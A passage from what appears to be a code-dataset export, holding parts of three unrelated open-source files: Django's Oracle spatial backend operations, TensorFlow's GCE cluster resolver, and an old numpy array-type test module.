point_on_surface = 'SDO_GEOM.SDO_POINTONSURFACE'
reverse = 'SDO_UTIL.REVERSE_LINESTRING'
sym_difference = 'SDO_GEOM.SDO_XOR'
transform = 'SDO_CS.TRANSFORM'
union = 'SDO_GEOM.SDO_UNION'
unionagg = 'SDO_AGGR_UNION'
from_text = 'SDO_GEOMETRY'
function_names = {
'Area': 'SDO_GEOM.SDO_AREA',
'BoundingCircle': 'SDO_GEOM.SDO_MBC',
'Centroid': 'SDO_GEOM.SDO_CENTROID',
'Difference': 'SDO_GEOM.SDO_DIFFERENCE',
'Distance': 'SDO_GEOM.SDO_DISTANCE',
'Intersection': 'SDO_GEOM.SDO_INTERSECTION',
'IsValid': 'SDO_GEOM.VALIDATE_GEOMETRY_WITH_CONTEXT',
'Length': 'SDO_GEOM.SDO_LENGTH',
'NumGeometries': 'SDO_UTIL.GETNUMELEM',
'NumPoints': 'SDO_UTIL.GETNUMVERTICES',
'Perimeter': 'SDO_GEOM.SDO_LENGTH',
'PointOnSurface': 'SDO_GEOM.SDO_POINTONSURFACE',
'Reverse': 'SDO_UTIL.REVERSE_LINESTRING',
'SymDifference': 'SDO_GEOM.SDO_XOR',
'Transform': 'SDO_CS.TRANSFORM',
'Union': 'SDO_GEOM.SDO_UNION',
}
# We want to get SDO Geometries as WKT because it is much easier to
# instantiate GEOS proxies from WKT than SDO_GEOMETRY(...) strings.
# However, this adversely affects performance (i.e., Java is called
# to convert to WKT on every query). If someone wishes to write a
# SDO_GEOMETRY(...) parser in Python, let me know =)
select = 'SDO_UTIL.TO_WKTGEOMETRY(%s)'
gis_operators = {
'contains': SDOOperator(func='SDO_CONTAINS'),
'coveredby': SDOOperator(func='SDO_COVEREDBY'),
'covers': SDOOperator(func='SDO_COVERS'),
'disjoint': SDODisjoint(),
'intersects': SDOOperator(func='SDO_OVERLAPBDYINTERSECT'), # TODO: Is this really the same as ST_Intersects()?
'isvalid': SDOIsValid(func='SDO_GEOM.VALIDATE_GEOMETRY_WITH_CONTEXT'),
'equals': SDOOperator(func='SDO_EQUAL'),
'exact': SDOOperator(func='SDO_EQUAL'),
'overlaps': SDOOperator(func='SDO_OVERLAPS'),
'same_as': SDOOperator(func='SDO_EQUAL'),
'relate': SDORelate(), # Oracle uses a different syntax, e.g., 'mask=inside+touch'
'touches': SDOOperator(func='SDO_TOUCH'),
'within': SDOOperator(func='SDO_INSIDE'),
'distance_gt': SDODistance(op='>'),
'distance_gte': SDODistance(op='>='),
'distance_lt': SDODistance(op='<'),
'distance_lte': SDODistance(op='<='),
'dwithin': SDODWithin(),
}
truncate_params = {'relate': None}
@cached_property
def unsupported_functions(self):
unsupported = {
'AsGeoJSON', 'AsKML', 'AsSVG', 'Envelope', 'ForceRHR', 'GeoHash',
'MakeValid', 'MemSize', 'Scale', 'SnapToGrid', 'Translate',
}
if self.connection.oracle_full_version < '12.1.0.2':
unsupported.add('BoundingCircle')
return unsupported
def geo_quote_name(self, name):
return super(OracleOperations, self).geo_quote_name(name).upper()
def get_db_converters(self, expression):
converters = super(OracleOperations, self).get_db_converters(expression)
internal_type = expression.output_field.get_internal_type()
geometry_fields = (
'PointField', 'GeometryField', 'LineStringField',
'PolygonField', 'MultiPointField', 'MultiLineStringField',
'MultiPolygonField', 'GeometryCollectionField', 'GeomField',
'GMLField',
)
if internal_type in geometry_fields:
converters.append(self.convert_textfield_value)
if hasattr(expression.output_field, 'geom_type'):
converters.append(self.convert_geometry)
return converters
def convert_geometry(self, value, expression, connection, context):
if value:
value = Geometry(value)
if 'transformed_srid' in context:
value.srid = context['transformed_srid']
return value
def convert_extent(self, clob, srid):
if clob:
# Generally, Oracle returns a polygon for the extent -- however,
# it can return a single point if there's only one Point in the
# table.
ext_geom = Geometry(clob.read(), srid)
gtype = str(ext_geom.geom_type)
if gtype == 'Polygon':
# Construct the 4-tuple from the coordinates in the polygon.
shell = ext_geom.shell
ll, ur = shell[0][:2], shell[2][:2]
elif gtype == 'Point':
ll = ext_geom.coords[:2]
ur = ll
else:
raise Exception('Unexpected geometry type returned for extent: %s' % gtype)
xmin, ymin = ll
xmax, ymax = ur
return (xmin, ymin, xmax, ymax)
else:
return None
def geo_db_type(self, f):
"""
Returns the geometry database type for Oracle. Unlike other spatial
backends, no stored procedure is necessary and it's the same for all
geometry types.
"""
return 'MDSYS.SDO_GEOMETRY'
def get_distance(self, f, value, lookup_type, **kwargs):
"""
Returns the distance parameters given the value and the lookup type.
On Oracle, geometry columns with a geodetic coordinate system behave
implicitly like a geography column, and thus meters will be used as
the distance parameter on them.
"""
if not value:
return []
value = value[0]
if isinstance(value, Distance):
if f.geodetic(self.connection):
dist_param = value.m
else:
dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
else:
dist_param = value
# dwithin lookups on Oracle require a special string parameter
# that starts with "distance=".
if lookup_type == 'dwithin':
dist_param = 'distance=%s' % dist_param
return [dist_param]
def get_geom_placeholder(self, f, value, compiler):
"""
Provides a proper substitution value for Geometries that are not in the
SRID of the field. Specifically, this routine will substitute in the
SDO_CS.TRANSFORM() function call.
"""
if value is None:
return 'NULL'
def transform_value(val, srid):
return val.srid != srid
if hasattr(value, 'as_sql'):
if transform_value(value, f.srid):
placeholder = '%s(%%s, %s)' % (self.transform, f.srid)
else:
placeholder = '%s'
# No geometry value used for F expression, substitute in
# the column name instead.
sql, _ = compiler.compile(value)
return placeholder % sql
else:
if transform_value(value, f.srid):
return '%s(SDO_GEOMETRY(%%s, %s), %s)' % (self.transform, value.srid, f.srid)
else:
return 'SDO_GEOMETRY(%%s, %s)' % f.srid
def spatial_aggregate_name(self, agg_name):
"""
Returns the spatial aggregate SQL name.
"""
agg_name = 'unionagg' if agg_name.lower() == 'union' else agg_name.lower()
return getattr(self, agg_name)
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
from django.contrib.gis.db.backends.oracle.models import OracleGeometryColumns
return OracleGeometryColumns
def spatial_ref_sys(self):
from django.contrib.gis.db.backends.oracle.models import OracleSpatialRefSys
return OracleSpatialRefSys
def modify_insert_params(self, placeholder, params):
"""Drop out insert parameters for NULL placeholder. Needed for Oracle Spatial
backend due to #10888.
"""
if placeholder == 'NULL':
return []
return super(OracleOperations, self).modify_insert_params(placeholder, params)
| apache-2.0 |
lukeiwanski/tensorflow | tensorflow/contrib/cluster_resolver/python/training/gce_cluster_resolver.py | 24 | 5151 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implementation of Cluster Resolvers for GCE Instance Groups."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.cluster_resolver.python.training.cluster_resolver import ClusterResolver
from tensorflow.python.training.server_lib import ClusterSpec
_GOOGLE_API_CLIENT_INSTALLED = True
try:
from googleapiclient import discovery # pylint: disable=g-import-not-at-top
from oauth2client.client import GoogleCredentials # pylint: disable=g-import-not-at-top
except ImportError:
_GOOGLE_API_CLIENT_INSTALLED = False
class GceClusterResolver(ClusterResolver):
"""Cluster Resolver for Google Compute Engine.
This is an implementation of cluster resolvers for the Google Compute Engine
instance group platform. By specifying a project, zone, and instance group,
this will retrieve the IP address of all the instances within the instance
group and return a Cluster Resolver object suitable for use for distributed
TensorFlow.
"""
def __init__(self,
project,
zone,
instance_group,
port,
job_name='worker',
credentials='default',
service=None):
"""Creates a new GceClusterResolver object.
This takes in a few parameters and creates a GceClusterResolver project. It
will then use these parameters to query the GCE API for the IP addresses of
each instance in the instance group.
Args:
project: Name of the GCE project
zone: Zone of the GCE instance group
instance_group: Name of the GCE instance group
port: Port of the listening TensorFlow server (default: 8470)
job_name: Name of the TensorFlow job this set of instances belongs to
credentials: GCE Credentials. If nothing is specified, this defaults to
GoogleCredentials.get_application_default()
service: The GCE API object returned by the googleapiclient.discovery
function. (Default: discovery.build('compute', 'v1')). If you specify a
custom service object, then the credentials parameter will be ignored.
Raises:
ImportError: If the googleapiclient is not installed.
"""
self._project = project
self._zone = zone
self._instance_group = instance_group
self._job_name = job_name
self._port = port
self._credentials = credentials
if credentials == 'default':
if _GOOGLE_API_CLIENT_INSTALLED:
self._credentials = GoogleCredentials.get_application_default()
if service is None:
if not _GOOGLE_API_CLIENT_INSTALLED:
raise ImportError('googleapiclient must be installed before using the '
'GCE cluster resolver')
self._service = discovery.build(
'compute', 'v1',
credentials=self._credentials)
else:
self._service = service
def cluster_spec(self):
"""Returns a ClusterSpec object based on the latest instance group info.
This returns a ClusterSpec object for use based on information from the
specified instance group. We will retrieve the information from the GCE APIs
every time this method is called.
Returns:
A ClusterSpec containing host information retrieved from GCE.
"""
request_body = {'instanceState': 'RUNNING'}
request = self._service.instanceGroups().listInstances(
project=self._project,
zone=self._zone,
instanceGroups=self._instance_group,
body=request_body,
orderBy='name')
worker_list = []
while request is not None:
response = request.execute()
items = response['items']
for instance in items:
instance_name = instance['instance'].split('/')[-1]
instance_request = self._service.instances().get(
project=self._project,
zone=self._zone,
instance=instance_name)
if instance_request is not None:
instance_details = instance_request.execute()
ip_address = instance_details['networkInterfaces'][0]['networkIP']
instance_url = '%s:%s' % (ip_address, self._port)
worker_list.append(instance_url)
request = self._service.instanceGroups().listInstances_next(
previous_request=request,
previous_response=response)
worker_list.sort()
return ClusterSpec({self._job_name: worker_list})
def master(self):
return ''
| apache-2.0 |
tcheehow/MissionPlanner | Lib/site-packages/numpy/core/tests/test_npy_arraytypes.py | 54 | 5864 | import sys
import warnings
import numpy as np
from numpy.testing import *
warnings.filterwarnings('ignore',
'Casting complex values to real discards the imaginary part')
types = [np.bool_, np.byte, np.ubyte, np.short, np.ushort, np.intc, np.uintc,
np.int_, np.uint, np.longlong, np.ulonglong,
np.single, np.double, np.longdouble, np.csingle,
np.cdouble, np.clongdouble]
alltypes = list( types )
alltypes.append( np.datetime64 )
alltypes.append( np.timedelta64 )
class TestArrayTypes(TestCase):
def test_argmax( self ):
x = np.array( [False, False, True, False], dtype=np.bool )
assert x.argmax() == 2, "Broken array.argmax on np.bool"
a = np.array( [u'aaa', u'aa', u'bbb'] )
# u'aaa' > u'aa' and u'bbb' > u'aaa' Hence, argmax == 2.
assert a.argmax() == 2, "Broken array.argmax on unicode data."
a = np.array( [ 'aaa', 'aa', 'bbb'] )
# 'aaa' > 'aa' and 'bbb' > 'aaa' Hence, argmax == 2.
assert a.argmax() == 2, "Broken array.argmax on string data."
def test_argmax_numeric( self ):
# Skip the np.bool_ type as it lacks a fill function, hence can't use
# arange().
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
assert a.argmax() == 4, "Broken array.argmax on type: " + t
def test_nonzero_numeric_types( self ):
for k,t in enumerate(alltypes):
a = np.array( [ t(1) ] )
assert a, "Broken array.nonzero on type: " + t
def test_nonzero_string_types( self ):
a = np.array( [ 'aaa' ] )
assert a, "Broken array.nonzero on string elements."
a = np.array( [ u'aaa' ] )
assert a, "Broken array.nonzero on Unicode elements."
def test_compare( self ):
# Light bulb! argmax doesn't call compare() for numeric/logical
# types. It only does that for string types. Duh.
pass
def test_copyswap( self ):
# Skip np.bool_.
for k,t in enumerate( types[1:] ):
x = np.arange( 10, dtype=t )
# This should exeercise <typoe>_copyswap
x[::2].fill( t(2) )
assert_equal( x, [2,1,2,3,2,5,2,7,2,9] )
def test_copyswap_misc( self ):
x = np.array( [ u'a', u'b', u'c' ] )
x[::2].fill( u'd' )
assert_equal( x, [u'd', u'b', u'd'] )
def test_copyswapn( self ):
# bool lacks arange support.
for k,t in enumerate( alltypes[1:] ):
x = np.arange( 10, dtype=t )
y = x.byteswap()
z = y.byteswap()
assert_equal( z, x )
def test_copyswapn_misc( self ):
x = np.array( [ u'a', u'b', u'c' ] )
y = x.byteswap()
z = y.byteswap()
assert_equal( z, x )
def test_compare( self ):
for k,t in enumerate( alltypes[1:] ):
try:
a = np.arange( 10, dtype=t )
keys = a[::2]
b = a.searchsorted( keys )
c = a.copy()
np.insert( c, b, b.astype( t ) )
c.sort()
assert_equal( c, a )
except TypeError, e:
print "Trouble with type %d:" % k, e
def test_compare_bool( self ):
# bool can't handle numpy.arange(), so has to be coded separately.
a = np.array( [False, True], dtype=np.bool_ )
keys = a
b = a.searchsorted( keys )
c = a.copy()
np.insert( c, b, keys )
c.sort()
assert_equal( c, a )
def test_dot( self ):
# Do something to test dot on bool...
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 3, dtype=t ) + 1
assert a.dot(a) == t(14), \
"Problem with dot product with array of type %s" % k
def test_clip( self ):
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
b = a.clip( 2, 3 )
x = np.array( [2,2,2,3,3], dtype=t )
assert_equal( b, x )
def test_clip_bool( self ):
a = np.array( [False, True], np.bool )
assert_equal( a.clip(False,False), [False, False] )
def test_array_casting( self ):
for k,t in enumerate( alltypes ):
a = np.array( [ t(1) ] )
for k2, t2 in enumerate( alltypes ):
b = a.astype( t2 )
if k2 < len(types):
assert b[0] == 1, \
"Busted array type casting: k=%d k2=%d" % (k,k2)
else:
# Casting to datetime64 yields a 1/1/1970+... result,
# which isn't so hot for checking against "1". So, in
# these cases, just cast back to the starting time, and
# make sure we got back what we started with.
c = b.astype( t )
assert_equal( c, a )
def test_take( self ):
# Test all types, but skipp np.bool_ for now, as it lacks a fill
# function. Grrr.
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 10, dtype=t )
idx = np.arange(5) * 2
c = np.take( a, idx )
assert_equal( c, a[::2] )
def test_putmask( self ):
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
mask = np.zeros( 5, dtype=np.bool )
mask[::2] = True
np.putmask( a, mask, t(8) )
x = np.array( [8,1,8,3,8], dtype=t )
assert_equal( a, x )
def test_fillwithscalar( self ):
a = np.empty( 2, dtype=np.datetime64 )
a.fill( np.datetime64( 3 ) )
x = np.zeros( 2, dtype=np.datetime64 ) + 3
assert_equal( a, x )
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.